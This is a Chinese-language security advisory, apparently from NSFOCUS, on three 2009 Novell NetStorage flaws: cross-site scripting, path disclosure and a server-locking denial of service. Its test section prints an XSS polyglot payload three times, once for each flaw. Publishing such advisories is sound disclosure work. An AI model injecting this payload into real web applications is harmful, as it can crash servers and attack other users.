安全研究

安全漏洞
Novell NetStorage多个远程安全漏洞

发布日期:2009-03-26
更新日期:2009-03-31

受影响系统:
Novell Netstorage 3.1.5-19
Novell Netstorage 2.0.1
描述:
BUGTRAQ  ID: 34267

Novell NetStorage允许用户从Internet访问Novell网络中受保护的文件。

Novell NetStorage中的多个漏洞可能被远程利用导致拒绝服务、泄露配置信息或执行跨站脚本攻击。

#1 - Filter字段跨站脚本攻击

Novell NetStorage没有正确地过滤用户所提交的filter字段输入,这可能对其他认证用户执行跨站脚本攻击。

#2 - Mail操作泄露路径

如果用户在文件列表中右击了某文件并选择了mail选项,然后在任意字段粘贴脚本代码,应用程序就会在生成的错误消息中泄露安装路径。

#3 - 文件属性拒绝服务

在与文件交互时,如果用户右击了文件并点击NFS Info或Netware Info,则向各种字段提供脚本代码会导致Netware服务器终止并锁定。

<*来源:BugsNotHugs (bugsnothugs@gmail.com
  
  链接:http://marc.info/?l=bugtraq&m=123818332711497&w=2
        http://secunia.com/advisories/34769/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

跨站脚本:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;
&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

拒绝服务:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;
/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

信息泄露:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;
/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

建议:
厂商补丁:

Novell
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://support.novell.com/security-alerts

浏览次数:2370
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客